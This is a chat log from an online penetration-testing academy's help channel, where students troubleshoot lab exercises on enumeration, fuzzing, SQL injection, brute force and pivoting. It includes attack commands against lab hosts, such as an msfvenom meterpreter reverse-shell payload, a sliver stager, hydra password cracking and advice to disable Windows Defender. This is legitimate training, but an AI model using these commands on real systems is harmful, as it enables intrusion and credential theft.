#modules
Anyone?
I used the dev box to compile the binary, ran it and caught a shell from the pwn box. Copied the exe to the pwnbox, terminate the dev box, start the target box and transfer the exe to the directory stated. I don't see why any port forwarding is needed.
how are you encrypting the payload
Anyway I'm gonna re-do it from scratch and try again
AES, like in the example
Had to rm -rf ptunnel-ng and re-clone to fix this. Not sure what was going on.
anyone help me with Intro to Whitebox Pentesting SA2, i keep getting "code injection should not be possible, even without sanitization or validation"
I am currently working on the following question in the Footprinting > SMTP: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. I thought the following would be it: ||nmap -v -p25 -n --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} 10.129.42.195|| However, this returns no accounts. I also tried ||smtp-user-enum -U usernames.txt -t 10.129.42.195 -m 150 -M VRFY||, but this too returned no results. Note: usernames.txt contains the same contents as the given file
Don't know what -m does
But you might wanna increase the wait time to 20+ seconds
It's because your scanning is too fast
You may also need to attach the inlanefreight.htb domain
-m adds a max number of processes. I removed that, and tried adding a wait time of 20s. I'll see what happens.
Yep, an increased wait time ended up working. Why would an enumeration going too fast result in a no positive results? Does it just not have time to establish a connection, and so it times out?
SMTP is a slow thing
I see. How likely am I to run into this problem with other protocols? Not very likely, I take it?
It depends
Well, just one more thing to consider I guess
Hey currently stuck on this one any help for how to progress for the final skill assessment? I've got to the /SECRET/secret.xxx part and not sure how to progress.
You'll learn tiny quirks of each protocol as you go
The page tells you what parameter name to fuzz values for
I did see that
So...
I don't understand how to utilize that info
Recall the parameter fuzzing section
will review it
I suggest taking notes as you go
yeah really seeing the value in that now
The more you do it the less you'll need to rely on them
But they're definitely good for "wait what was the thing again?"
I might as well ask my other question. I am working on Footprinting > DNS: What is the FQDN of the host where the last octet ends with "x.x.x.203"?. I have done the following:
- ||dig axfr inlanefreight.htb @10.129.42.195||
- ||dig axfr internal.inlanefreight.htb @10.129.42.195||
- ||dnsenum --dnsserver 10.129.42.195 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt internal.inlanefreight.htb||
However, I am getting the error that there are no nameservers. ||I have tried all different lists (as the hint says)||
Do I have to enable the ZAP HUD? I don't see it in the in-built browser
Yeah, but you can easily use burp for this
Subdomains of subdomains
For which? :-)
To answer the questions
You'll need to do things slightly differently
Figured it would be good to learn ZAP since it has the auto scan feature (for exam)
¯\_(ツ)_/¯
Ah yeah already did so for one question :) Do you prefer burp community over zap?
I used burp more but can't say I really needed the spidering feature
Also burp does cache the http requests made while it's running
Proxy > http history
It seems that the transfer fails for all other subdomains, which makes me think that it is definitely a subdomain of ||internal||. However, all of the subdomains of that subdomain fail anyway... That is the main problem I was running into earlier
It's not
Your logic is backwards
You want to attack subdomains you can't natively transfer to
Dnsenum is a bruteforce tool
So they would not appear in that list I was testing against?
You don't need to bruteforce what you can already access
That would make sense
One of the other subdomains from your base axfr is the way forward
But your list is in fact wrong
You'll need a more fierce list as well
can I DM you the command I'm trying to see if I'm far off?
Hey, so i am working on What's the contents of table flag5? (Case #5) - Attack Tuning SQL MAP Essentials. I was initially using my kali and sqlmap keeps timing out. But when I use the same command on pwnbox, it works without a hitch.
Can someone please help me figure this out?
Poor Internet? Try using tcp instead of udp for the VPN connection.
i am using tcp vpn and my internet is working fine :/
I have been able to find ||ns.dev.inlanefreight.htb||. I ran ||dig ns/axfr/any/soa ns.dev.inlanefreight.htb @10.129.42.195||, however, none of these helped.
I've tried fuzzing the parameter like this but it doesn't seem to get me anywhere. ||ffuf -u http://IP:PORT/admin/panel.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "accessID=FUZZ" -w common.txt -v||
I may have just figured it out...
Pivoting, Tunneling, and Port Forwarding > RDP and SOCKS Tunneling with SocksOverRDP
Why is this happening and what Windows Defender setting must I change on the target to ensure that this actually runs and doesn't throw an error like this? Anyone? @fathom pendant?
Can't spawn a pwnbox for like 2 days anymore. Do you guys have problems too or is it a skill issue?
I can spawn a pwnbox whenever I want for as long as I want, but that may be because I am on a business plan
@foggy monolith please reduce the usage of markdown syntax when specifying the module and section names
i'm on plat sub
The file .dll is probably deleted by Windows Defender
And again, how do I prevent that?
you can stop defender
Thank you very much indeed
Disable real time protection, Google can help
my recent attempt ||wenum -w common.txt --hc 200 -u "http://IP:PORT/admin/panel.php?accessID=FUZZ"|| also doesn't appear to show anything
I feel like I have all the right pieces I just don't know how to put it together
will try again later thanks for the help thus far
I mean I'd use ffuf or gobuster instead
I'm struggling to interpret a Question from "Filter Contents - Linux Fundamentals"
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."
i don't know if the Q is talking about like URL links containing "inlanefreight" or something else, but i've tried using:
curl https://www.inlanefreight.com | grep -o www.inlanefreight.com.*\" | sort | uniq | wc -l
to no avail,
This is the only bullshit one in the module as it requires some html knowledge
When you curl a website you're generally gonna get its source code
module: attack common service - RDP
[12:44:10:387] [66982:000105a7] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x55c6cdd6c4d0]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1] [12:44:10:387] [66982:000105a7] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
I got username and password from ***.xml file in windows but i can't connect to machine via RDP, getting error
The link I shared explains it much better
I don't recall an xml file playing a role in the rdp auth but it's been a minute
what error?
Yeah tbh idk what xml file you're looking at as credentials are directly tied to the first question
Error:
[ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
Is there any method of connecting to RDP other than username and password?
is this the last question on the section?
yup
yes, i did it using HTB credential given in the module
yeah try restarting the machine
Did you use the /pth: option for using the admin hash?
I do not have hash instead username and pass
?
Don't know where you got that from
Check the desktop of htb-student
U didn’t click on the notes?
The file referred to by the first question
nope, i enumerated it (credential harvested)
feeling same
How did u miss the desktop then
There was no need at all to credential harvest
Especially a file called directly out by a question
hit me again!
First question of the section my guy
Can't be any clearer than that to look at
Also just in case try resetting your vm
The error you're getting isn't necessarily a log on error indicating bad creds
I got initial foot hold and do not have admin priv, any hint?
...
My brother in christ
https://academy.hackthebox.com/module/116/section/1171 this section yes?

Open the file referenced by Question 1
Since you can't seem to understand anything beyond "do this"
ohh, i never thought of that
It's literally what me and @safe star Have been saying the past x minutes
I see a file titled that, I'm gonna click it, even if it's out of frustration of trying everything else
This module is about the basics of services, not credential harvesting or any of that
Everything is generally given in a fairly straightforward way
got it
Or just follow what the section says for the most part
If it doesn't come up in the section, it may come up in the skill assessments
Didn’t password attacks go over it too?
Why? What exactly is confusing you?
Nvm it’s all sorted now
I was confused on why the 302 aren’t shown on browser
And only shown on the burp
it takes time to build mindset
Indeed
So don't try and think outside the box
Always start with simple first
Like stuff on the desktop
sure, I appreciate you
The biggest and most important thing is not discounting the simple solution to the problem given
And sometimes even asking: did the question ask me to, or did the module/section go over this
@uncut ocean u get it?
tried the defender off
but still it gets deleted
i just copied and pasted it on to the desktop then disabled it
did you run cmd as admin?
can i skip Pivoting, Tunneling, and Port Forwarding
if i know how to use ligolo-ng ?
still good to go over the module and see other methods
even if you're familiar with the subject
still deleted
dm a pic
no bro it's one of the best modules, it will give you an idea of how things actually work in the background
Note to current and future students of HTTP Attacks: just solved the HTTP Response Splitting Question. If anyone in the future might need a nudge, feel free DM me. As someone stated before, I too struggled with Firefox and used Chromium instead. Then, pay attention to the Hint provided by HTB..
Any nudge on how to get the second flag (on SQL01) on the Using Crackmapexec Skill assessment lab exercise?
Is Real Time protection turned off ?
roast
Already done and found "A**l". I see no special permission in the MSSQL, so I guess ntlmrelayx?
check shares
Could have finished more but meh
I don't see anything strange on SQL01, the only share I see readable is the one on DC01
Footprint - DNS
Q1. Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain
How to find FQDN?
I tried this command.
||dig PTR inlanefreight.htb @10.x.x.x||
||dig A inlanefreight.htb @10.x.x.x||
Next, tried this command.
||dig axfr inlanefreight.htb @10.x.x.x||
Finally, found the result. But I don't understand why ||ns.inlanefreight.htb.|| can be an answer. Why can't the below be an answer?
||root.inlanefreight.htb.||
||inlanefreight.htb.||
Thanks.
there's a share containing a lot of things you can access
Thanks! My bad I was blinded by all the files LOL 😄
yeah time to dig through them 
because the question is asking for the DNS' FQDN
Attacking Common Applications - WordPress - Discovery & Enumeration
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
I found :
=== Mail Masta ===
=== Contact Form 7 ===
└─$ curl -s http://blog.inlanefreight.local/ | grep plugins
<link rel='stylesheet' id='contact-form-7-css' href='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/subscriber.js?ver=5.8' id='subscriber-js-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine-en.js?ver=5.8' id='validation-engine-en-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js?ver=5.8' id='validation-engine-js'></script>
<link rel='stylesheet' id='mm_frontend-css' href='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.8' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2' id='contact-form-7-js'></script>
but incorrect
can anyone help me pls
OMG.. my english issue 😦 thanks
guys....
Have you performed a wpScan?
yes I found the same plugins
||[+] mail-masta||
||[+] contact-form-7||
Wpscan won’t find it
Try curling more pages
I curled index page so now Should I look for another one?
Use whatever tool you like, but always look at all pages.
.....
thanks
then how can i find
Find the version number of this plugin. (i.e., 4.5.2)
I looked all plugins readme.txt files but there is no
Readme files are usually capitalized
it doesn't matter, there is information there but not for 4.5.2
Have u looked through the file?
yes
The change log?
no only readme.txt
Yes change log in the readme
did you mean log.txt ?
No it should be in the readme
bro I said I already read all readme.txt files
Wyd all?
I mean all plugins' readme
Did u find the plugin then type the name in the plugin directory?
yes I did
Send a pic in dm
vHosts needed for these questions: inlanefreight.htb + 1 Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"
Have added host to etc/hosts
gobuster vhost -u http://inlanefreight.htb -w subdomains-top1million-110000.txt --append-domain
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://inlanefreight.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
Starting gobuster in VHOST enumeration mode
Error: error on running gobuster: unable to connect to http://inlanefreight.htb/: Get "http://inlanefreight.htb/": dial tcp 94.237.53.113:80: connect: connection refused
I get this error, how to proceed
This is the host added in etc/hosts file
you need to set a port
to the hosts file??
to your gobuster command
Should add the port number of our target ryt ?
Yes
In the ad skill assessment
- How to get reverse shell from webshell. I tried revshell. Not working. Causing errors
Is there anyone else facing challenge with https://academy.hackthebox.com/module/280/section/3130
Recursively fuzz the "recursive_fuzz" path on the target system (ie http://IP:PORT/recursive_fuzz/) to find the flag.
like it never reaches the end for me
i liked this module but at same time i'm hating it
it's just eating so much time "i just don't know if it's for good reason or not".
can someone help here?
like what type of vuln is it?
upload ?
I'm having some trouble with the LFI Skill Assessment in the last step....
Can I DM someone?
which mod?
File Inclusion
dm me
which part
Yeah it's file upload. Web shell is already in the assessment. I am just trying to get a reverse shell to get started.
Skill Assessment
@hexed lintel bro calling you in dm
connected to vpn or pwnbox?
@strange forge which module and section?
Ad enumeration and attacks skill assessment 1
can you dm the question?
use the webshell like a regular shell, grab one from revshells.com
or drop here
it's not a question, they just want to get a revshell from the webshell
It didn't take forever for me. You can DM what tool and command you are using.
Thanks brother
Hi there, could someone help clarify this question: "If csrf.htb.net was using SSL encryption, would an attacker still be able to alter Julie Rogers' profile through a CSRF attack?" [Session Security / Cross-Site Request Forgery (GET-based)]. In the scenario presented, where the HTTP host is used, the attacker successfully captured user csrf token by sniffing the local network traffic. I'm struggling to understand how the correct answer can be ||true||, given that with SSL encryption enabled, the attacker shouldn't be able to capture CSRF token and eventually craft form to send a valid request to the API.
it's bit lengthy you want it here?
working the bbh -> sesession attacks module. HBU?
this is trying to have you discern HTTP vs HTTPs.
HTTP is delivered over application layer, while a subsequent (secured) connection over SSL is handled on transport layer. The browser still renders/stores the cookies/data (mentioned in the previous sections)
i was just pondering this the other day (how a stateless protocol like HTTP deals with stateful connections like SSL/TCP), chat gpt was /somewhat/ helpful to break this down, does that make sense or do you need a more in depth explanation? @covert vortex
got it, thanks mate : )
its like the transaction occurs encrypted. not the end result? my understanding is still very precarious so barring an answer from someone who is more aware of whats going on, i think that will suffice for a basic understanding
there's a uh, module somewheres about wireshark where they have you setup a (TLS?) cert to sniff traffic between http/s connections that may help solidify the actual transmission parts of this concept. sorry i dont have a link but im 99% sure its the wireshark module on academy
like if you sniff your own https traffic its encrypted but if you set up a cert (and a key or something?) you can see whats going on, not that thats specifically helpful here but it may round out the concept
Also while we're on this topic, you have a clear differentiation between XSS/CSRF vector right? this comes up in interview questions... CSRF requires user interaction, XSS requires no user interaction (and poses a much deeper threat in terms of what can be done leveraging xss). If you're ever asked "what's the core diff between xss/csrf"
or something like that
Hey im doing the thick client app attacking from attacking common applications, here i disabled the auto deletion and checked the temp folder for a batch file but im not seeing anything inside it
try searching this channel, i think this has come up a few times and has been answered. I don't have access to that module so I cannot be of help. There's 2-3 other users who get active around this time though who I've seen help on this module, they should be around shortly.
This may help a bit:
https://forum.hackthebox.com/t/exploiting-web-vulnerabilities-in-thick-client-applications/276823/37
For everyone having problems since not all us have the same “experience” on the matter on how to compile and such. The beginning is fairly straight forward so I’ll start to explain my steps from the modification of the “Invoker.java”. /* Beginning of Invoker.java code / / / package htb.fatty.client.methods; / / / redacted code *...
See i don't get any bat file when i restart the service after disabling that auto deletion
I dont see anyone properly addressing this issue in the forum
Above
did u search the channel from discord? lots of results youll need to browse them
I am doing "Skill Assessment" section of "Command Injection" module. I have found the point of injection but no matter what payload I use, I am getting "Malicious request denied".
I have tried
bypassing space filter,
bypassing blacklisted command using
character insertion,
command reverse,
case manipulation,
base64 encoding,
hex encoding,
tried reverse and hex encoding together in the payload.
But nothing seems to work. All I get is "Malicious request denied".
It did mention this issue im facing but solutions aren't given there, they moved onto a different problem
Yeah im seeing lots of complaints, T_T'' sorry theres no help there.
ok i think you need to try bypass + bypass (at some point)... and check your error messages carefully they change depending on which bypass method you use. If you have no single bypass working yet, go down the list from start to end of every bypass you tried in the module, and check your errors. For example one error message might say invalid extension while another says malicious... use ffuf or whatever to filter your output, burp (community edition) wont let you do this (easily)
Will try this. Thanks
How do I get started with hacking?
@small plover this is not the place for this
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thank you
Any help
.
Hey guys, I am not able to perform zone transfer, can someone guide me, stuck for a long time ^^ : After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
what cmd are you using to perform a zone transfer?
dig axfr @a.root-servers.net inlanefreight.htb
and your output?
you have the ip added to hosts right?
i think your @... might be wrong though
dig inlanefreight.htb and double check the dns server found in the results, or nslookup or w/e
its like we should add it name server ryt or am I wrong ??
no dont add the NS to /etc/hosts (if im not mistaken) but target it directly in your AXFR
Link to the section?
Ok let me try
dig axfr @a.root-servers.net 10.129.25.127
; <<>> DiG 9.20.0-Debian <<>> axfr @a.root-servers.net 10.129.25.127
; (2 servers found)
;; global options: +cmd
; Transfer failed.
:<
i believe your @DNS is targeting a public NS and we need to target a private dns to the target, as its a box that does not reach the internet
now what @DNS should I use
dig 10.129.25.127 NS
; <<>> DiG 9.20.0-Debian <<>> 10.129.25.127 NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64464
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1410
;; QUESTION SECTION:
;10.129.25.127. IN NS
;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
;; Query time: 29 msec
;; SERVER: 10.255.255.254#53(10.255.255.254) (UDP)
;; WHEN: Thu Sep 19 18:59:06 IST 2024
;; MSG SIZE rcvd: 117
what does your /etc/hosts file look like and also what does nslookup for inlanefreight.htb return? (after verifying that its correctly added to your hosts file)
@surreal heron ^
also give me a link to the section so i can review what i did there, please
nslookup inlanefreight.htb
Server: 10.255.255.254
Address: 10.255.255.254#53
** server can't find inlanefreight.htb: NXDOMAIN
Go over the steps again, make sure you're removing the delete rights correctly.
@quiet trout
thx, yeah for a sanity check remove the public DNS server a-root... and go with inlanefreight's IP address instead, see what happens
That i am doing properly
That too i tried let me show you
dig axfr @10.129.25.127 inlanefreight.htb
;; Connection to 10.129.25.127#53(10.129.25.127) for inlanefreight.htb failed: timed out.
;; no servers could be reached
;; Connection to 10.129.25.127#53(10.129.25.127) for inlanefreight.htb failed: timed out.
;; no servers could be reached
doing attack FTP from Attacking Common Services for some reason running medusa to bruteforce didn't work this the command i ran "medusa -U users.list -P passwords.list -h 10.129.203.6 -M ftp -n 2121 "
ok leave the @... part off entirely, what do you get?
dig axfr 10.129.25.127 inlanefreight.htb
; <<>> DiG 9.20.0-Debian <<>> axfr 10.129.25.127 inlanefreight.htb
;; global options: +cmd
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
; Transfer failed.
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
; Transfer failed.
dig axfr inlanefreight.htb
; <<>> DiG 9.20.0-Debian <<>> axfr inlanefreight.htb
;; global options: +cmd
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
; Transfer failed.
When im on starting module the target machine is stuck on "target is spawning", so I can't see the IP. I didn't click on it to start, it's been that since last session when I was logged in to academy
Refreshing the page doesn't solve the issue? I sometimes have this when I don't kill the instance at the end of a module
But usually refreshing the page gets things back to normal
Nope, its the same if i refresh, or well, it loads and auto starts (going to spawning machine) again
spawning target
@quiet trout
I would contact support then
Thanks 🙂
are you connecting to the target from a pwnbox? reset target perhaps?
im not sure why you're having this trouble.
spawn one in another section or switch vpn server
It worked, what would i do without you, my hacker daddy? 😄 @next bronze
Tried both, resetting 2 times, dont know what the issue is
Does double pivoting not work with ligolo in Pivoting Module -> Skill Assessment section? I've tried many things and was able to setup a file server by which I can directly transfer files from my Attack host to ||172.16.5.35|| windows host. But when I try the same for double pivoting it throws an error as: ERRO[0140] read tcp 127.0.0.1:53490->127.0.0.1:11601: use of closed network connection 2024/09/19 09:33:02 [ERR] yamux: Failed to write header: EOF
ok make sure your IP matches the new target IP in your /etc/hosts file, but your cmd looks right (either specify the target IP in your @.. or leave it blank, try both, you /should/ get results either way... just to rule out the public dns issue you were running into earlier
ok brother thanks
it does but this can happen if you have a bad connection
or your connection is unstable
but my connection is pretty stable. I tried resetting it multiple times as well but still didn't work.
try with the latest stable build of ligolo
I struggled the same way when I did it 2 days ago with ligolo... Ended up doing the second pivot with netsh.
Too bad because ligolo is super user friendly and easy to use
I was using 0.7.2 alpha something are you referring to the same?
If it's alpha it's not stable
I've been using 0.6.2
hey can anyone tell me how to handle when you either a) accidentally run the wrong cmd on a nc listener and redo it only to get target port in use (and lsof -i :9001 returns nothing) or b) when you occupy a common port like 8080, terminate the listener then need to run burp and it's occupied (and is still not listed in your lsof...) ... i run into this every so often and i have to reset the box to solve this... it's frustrating.
Last stable is 0.6.2 indeed
I'll try with one too
See i don't get any bat file when i restart the service after disabling that auto deletion in attacking thick client apps section
Hello everyone I am a first-year student, and I have a difficult choice: I want to become a pentester, or rather, a specialist in reverse engineering or web pentest, but the training, of course, will be very difficult, and I want to first study to be a DevOps engineer, then work for DevOps and eventually switch to pentest. What would you recommend to do?
1 thing i learned: go where the heart takes you, it's your choice not ours
work is fun as long as you make it fun
not after that
i think DevOps experience will help with securing an IT job, but this would be better discussed in #careers-and-certs
Any idea what the second IP is for?
if you don't have access to the channel, please verify your account by following the instructions in #welcome
you're young enough that if you put in the effort you can try them all, get your ducks in a row then work a year doing this and a year doing that and see what you like
youll never really know unless you put time into trying it
must be related to module
No wonder Sherlock !
prob a DC and a host on the domain
or two DCs perhaps
or a DC and a DNS/DHCP server, you'll need to connect and see
Cant connect though get the log in prompt and the pass isnt valid
explore and take a sip of every drink and find which you liked the most in serial you have time to explore so take your time
xfreerdp? try a vnc instead?
oh i see you're using xrdp, unfamiliar with that one you should try xfreerdp
your user name may not be FQDN, being rejected by login prompt. xfreerdp's full syntax should resolve this as a sanity check
xfreerdp i am using
Thank you all for giving me the advice💚
Just to hack something, you need to know how it works and I thought that DevOps would be a great option, I would know how databases and SQL work, etc
I disagree
There is a problem in the module ATTACKING COMMON SERVICE, section ATTACKING EMAIL SERVICE, i am doing the right command but it's not working anymore, it worked once on pwnbox and never on my vm, any hint? The command is smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t <ip address> also to crack the password it's not working... hydra -l m*****@inlanefreight.htb -P password.list -f <ip address> smtp
Are you connected to vpn right?
I am
What isnt working the user enum or hydra?
What error does each one print ?
None, it's just saying nothing was found...
Ping to the ip does it work?
it take time
It says it doesn't find anything
No...
It goes to the end
Try enumerating users with other tool
ok
I ll try what you said
you are enumerating the user right?
Yes, i want to find the username
dang it i dropped the spoiler
I find it since the command worked once
instead of RCPT try using VRFY
you are working on footprinting module?
No, i am on the attack common services, email section
With what?
did it work on your side ?
Hey could someone help me out with the attacking thick client applications section in attacking common services module
I have disabled the auto deletion of files in the temp folder and again run the .exe file in that section and checked the temp folder for the mentioned bat file that was supposed to be there now that i have turned off the auto deletion, but i don't see that bat file in the temp folder
The hydra too ?
got the user?
Yes
try hydra with that.
looks like it's working again, gonna try to hydra
everything is working just fine, they did something or maybe it was lagging but i didn't change anything in what i typed
Thanks for the help ❤️
lovely
Did i miss something? We have macOS modules now?
It's already been there.
Didnt see that before, lol
smtp is a slow service
Been there for ages
It requires having access to a MAC
thats why i said it takes time
Really?
...yes
It's kinda hard and less than legal/easy to emulate a Mac
The MacOS isn't really available
And if you do find it, you'd need an ARM chip
Yeah, I remember downloading mac os iso and trying as a VM and really had a bad time lol.
Understandable
Hi HTB Folks. I am working on the Whitebox Attacks - Type juggling assessment and I could really use a nudge. Anybody on who might be able to help?
In the Whitebox Attacks - Type juggling assessment am I supposed to stick to the Sha256 magic hashes and am I correct that the username has to include 'admin' in it, but it cant be at the beginning? I've been working on this for 3 days and I am not sure what else to try
Any help
haven't pulled enough money to unlock this module same for mac one
sorry
can someone give me hand to run one command and give me the result of it?
Anyone have trouble spawning targets
That would be illegal
Any one knws why the bat file isnt shown here
This is from the thick client attacking in attacking common services
did anyone here face problems setting up/downloading sliver?
Go through the steps to make sure you're setting permissions correctly. I just did this seconds ago to confirm.
All I used were the steps in the module
Mm
sdfadfasfdosajfopaejfioewjpfoiewjewfpoiqwjefopwjoiwjfeiqw
I thought I disabled the auto-delete stuff, but I don't know if it's still deleting
Bless you
You just need to disable the delete perms for your user
Did your keyboard have a stroke? 😅
I did
That's what's troubling: I did it many times, but I still think the .bat file is getting deleted
hi cat
Then you didn't disable it properly after turning off inheritance
I disabled it: clicked on edit on cybervaca and turned the tick off on
If you did it correctly, the .bat file will be exactly where it says it will be
Hit continue
Some things you can't apply it to
Since you're basically trying to cascade the permissions
I am working on the sqlmap section Q: What's the contents of table flag4? (Case #4). This one wants to use JSON but I am not sure how to copy the request as JSON?
The module should show you how to copy the request
Yes I can copy as curl but not as JSON.
Yeah, after all this I ran the exe, but the .bat file is still getting deleted, I think
Did you hit continue until no more errors?
Yup
For the Sliver C2 module, I'm running into issues with generating a stager on my local attack box which works on Pwnbox when repro'd.
The following command times out with this error:
sliver > generate stager --lhost 10.10.X.X --lport 8443 --format csharp
[!] Error: rpc error: code = Unknown desc = exit status 1 - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH
However, running the equivalent msfvenom command directly will generate shellcode
## Command
$ msfvenom --platform windows --arch x64 --format csharp --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=8443 EXITFUNC=thread
## Environment
$ msfconsole -V
Framework Version: 6.4.20-dev
$ which msfconsole
/usr/bin/msfconsole
$ which msfvenom
/usr/bin/msfvenom
$ which sliver
/usr/local/bin/sliver
$ sudo systemctl status sliver
Active: active (running)
CGroup: /system.slice/sliver.service
└─<PID> /root/sliver-server daemon
For further context, I installed sliver with the provided one-liner & reinstalled metasploit-framework via apt. Anyone with troubleshooting advice or experience with this one? Also if needed, I can repost this on #1024429874246590575 for further outreach. Thanks!
Sigh. When you copy the request (not as curl or anything) it also copies the data type, like JSON
Still no .bat file in the folder
I'm assuming you're going to the user's temp folder and not C:\temp
:)
and disabling the permissions there
I was going to C:\Users\cybervaca\AppData\Local\Temp
And disabled permissions there
In temp
The file you're looking for may not be under \2
Look through the other folders
Yaa
I don't have anything inside \2, just the ched file and the hyperfdata cybervaca file, nothing else. However, outside in the temp folder I've got all these files
Dude
The d52e.bat...
Check that
The batch file name is random each time it's run
@granite slate Same issue happening to me since yesterday 😪
How did you check the contents of the .bat file?
Right-click > edit or in powershell cat [file].bat
Yaa
Yes
I said towards the bottom
Got the bottom, deleted it, and saved
Yeah, it was a step
But was it a step to delete everything
Does anyone know how I can list the contents of a directory? sqlmap http://ip:port/dashboard/dashboard.php --data "search=a" --batch --level 2 --risk 2 --random-agent --cookie="PHPSESSID=pj3po8630q4ohs78mo1ma3cfv6" --file-read "/root/flag.txt" --output-dir "/tmp/memehp3"
The step in the reading stated modifying the batch file to only remove the parts regarding deleting files
What module and section is this for?
SQLMap Essentials skill assessment
I can't get a web shell for the permissions of the current DB user
I almost got it but don't know how to spot where the flag is
Why do you need to read a file? That's not what the skill assessment is asking for
lol
Also are you sure that's where you're meant to be injecting?
The sqlmap essentials module SA is asking you to get the contents of the table final_flag ¯\_(ツ)_/¯
No idea why you need a shell or anything for it
Yes, you are right, well seen; for some reason it was in the skill assessment of another module xd
Marcie, did you use codecademy before?
Probably briefly
Ah okay. I am thinking about following a python course lol
@fathom pendant I still have the same question but for:
SQL Injection Fundamentals
Skills Assessment - SQL Injection Fundamentals
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
Hi, I have a question about Windows Lateral Movement - Skill Assessment. I cannot enumerate internal network. I'm using proxychains + nmap and don't get any open ports... I did try some powershell scripts for it but it will take ages until done. Can you give some hint? What techniques did you use to find hosts and open port in internal network?
Root directory of filesystem != /root
sqlmap by itself searches for common root directories like /var/www/html
Well you said you have a working webshell
And sqli fundamentals doesn't require sqlmap to complete
I'm trying to get one
Recall the steps in one of the module sections
Also you don't need something fancy just a basic php shell will get the job done
Hey, I try to run a PowerShell cmd but PowerShell never loads
Powershell.exe
Run as admin
There's some GPO that doesn't allow it to be run as a regular user
# poetry install
Installing dependencies from lock file
Package operations: 112 installs, 2 updates, 0 removals
  • Updating pip (23.0.1 -> 23.2.1): Failed
  Error
  g-io-error-quark: The connection is closed (18)
  at /usr/lib/python3/dist-packages/keyring/backends/libsecret.py:134 in get_credential
      130│         Otherwise, it will return the first username and password combo that it finds.
      131│         """
      132│         query = self._query(service, username)
      133│         try:
    → 134│             items = Secret.password_search_sync(
      135│                 self.schema, query, Secret.SearchFlags.UNLOCK, None
      136│             )
      137│         except GLib.Error as error:
      138│             quark = GLib.quark_try_string('g-io-error-quark')
Why do I get an error installing poetry?
The problem with using --batch: the cookies of a non-authorized user were taken by sqlmap and merged there. Just solved it manually by telling it not to do that.
poetry run crackmapexec
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1206, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1178, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 690, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/home/aesliex/Desktop/CrackMapExec/cme/crackmapexec.py", line 3, in <module>
    from cme.helpers.logger import highlight
  File "/home/aesliex/Desktop/CrackMapExec/cme/helpers/logger.py", line 5, in <module>
    from termcolor import colored
ModuleNotFoundError: No module named 'termcolor'
How can I fix this?
Slightly unrelated question, what module are you working on?
module/147/section/1327
Password Attacks in the Pentester path
Password attacks, what section? Numbers don't mean anything to anyone here.
network services
So you're trying to install cme from source?
I installed it using git clone, but when I do poetry run crackmapexec it doesn't work
I tried apt-get install -y libssl-dev libffi-dev python-dev build-essential but it didn't work
It said this error - apt-get install -y libssl-dev libffi-dev python-dev build-essential
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package python-dev is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
